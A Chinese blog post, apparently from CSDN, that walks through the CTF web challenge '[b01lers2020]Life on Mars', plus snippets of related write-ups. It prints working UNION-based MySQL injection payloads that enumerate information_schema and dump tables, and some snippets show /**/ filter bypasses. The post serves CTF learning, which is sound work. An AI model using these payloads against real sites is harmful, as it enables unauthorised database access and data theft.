[b01lers2020]Life on Mars

最新推荐文章于 2022-11-21 16:57:33 发布
最新推荐文章于 2022-11-21 16:57:33 发布
阅读量294 收藏 1
点赞数
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124336527
版权

点进去可以看见是类似于日记一样的

起初我以为是那种唬人的,flag在每个主题里面,NO

扫描目录,无东西

看源码,无hint

通过抓包跳转发现有东西

有参数!

把search改为1会回显1,改为2还是1,于是在想利用之前那个地点来试试可不可以联合注入

 发现成功回显了1,2,看来这就是一个注入题目了,试试database()

数据库aliens

 union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

表名amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin

union select 1,group_concat(column_name) from information_schema.columns where table_name='xxxx'各个表都查一下

字段都是id,name,description

/query?search=amazonis_planitia+union+select+1,group_concat(id,0x3a,name,0x3a,description)+from+aliens.amazonis_planitia

结果这些字段一个都没有,说明不是这个数据库。。。。。。

/query?search=amazonis_planitia+union+select+1,group_concat(schema_name)+from+information_schema.schemata

照着之前办法在alien_code数据库里面找即可 

学到了可以这么查所有的数据库信息,之前都没碰到过……

MySQL注入涉及的information_schema库讲解_Regenwald的博客-CSDN博客

-栀蓝-
关注
BUUCTF__[b01lers2020]Life on Mars_题解
风过江南乱的博客
05-06 779
BUUCTF [b01lers2020]Life on Mars sql联合注入
BUUCTF [b01lers2020]little_engine
weixin_53349587的博客
01-06 407
1.拿到文件,进入主函数: 这个是动调之前的主函数,开始动调: 其中,已知字符串已经给出,为unk_5617CE521220,一共300位: 进入加密函数sub_5608DAAB8510: 通过多次动态调试,得到了加密算法的逻辑。 看判断函数sub_5608DAAB85A0: 综上,写出加密脚本: a = [0xE1, 0xE6, 0xD0, 0x4A, 0xF2, 0xC3, 0x7E, 0xAA, 0xE6, 0xFC, 0x42, 0xB2, 0xF..
[b01lers2020]Life on Mars (难发现的sql注入)
最新发布
qq_62046696的博客
11-21 600
打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。到这里只能burp抓个包看看 抓包两个界面发现了get传参,考虑是否存在sql注入尝试额以后发现只返回了一个1,试一下别的引号闭合 直接进行查询所有的数据库名 看一下alien_code数据库 发现code表 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.cod
BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers
zippo1234的博客
10-26 991
BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers[b01lers2020]safety_in_numbers题目分析开始1.题目2.分析(1)pubkey.pem(2)小端存储(3)解法3.上脚本:4.get flag结语 每天一题,只能多不能少 [b01lers2020]safety_in_numbers 题目分析 1.pub.pem读取 2.n很大,或者说m^e相比于n很小。 开始 1.题目 给了三个文件 pubke.pem储存了n和e。 flag.enc是加密
[b01lers2020]Welcome to Earth
qq_40327508的博客
11-28 926
一直自动跳转/die/页面,抓包尝试 查看chase目录 后面就一路找,但是没找到什么有用的信息 看了wp才知道,关键点在js文件中 /static/js/door.js 最后来到static/js/fight.js 重新排序flag即可 from itertools import permutations flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"] item = permutations(flag) f
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 ...
BUUCTF:[b01lers2020]Life on Mars
末初的CSDN博客
08-01 2148
题目地址:https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站,目录扫描啥都没发现,用burp抓两个包分析一下,发现几个可疑传参 /query?search=如果地名输入正确,发现返回如下 order by判断字段,2字段时回显正确 union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示: 查库:/query?search=a
BUUCTF--[b01lers2020]Life on Mars
qq_46263951的博客
07-22 519
进入页面后什么也没发现,通过抓包看到一个可以参数 跟着参数走可以看到一个这样的页面 看大佬的wp接下来使用联合查询进行探测 当查询两个字段时可以正常显示 /query?search=amazonis_planitia union select 1,2 使用sqlmap扫描 扫描到这几个库,看名字应该是在alien_code中 扫描该库的表 扫描该表的列名 然后使用sqlmap --dump 不出来内容,只好手动 成功获得flag...
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2982
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[b01lers2020]Life on Mars WRITE UP
Swee
09-21 452
拿到网站没啥好说的,基本是静态的页面,先抓包。 发现包有问题,search参数 非常的奇怪 经初步判定有SQL注入 ORDER BY 2 得到 有两个参数 进行联合查询,得到所有数据库的名称 发现有个贼奇怪的 叫alien_code 进去看看 /query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值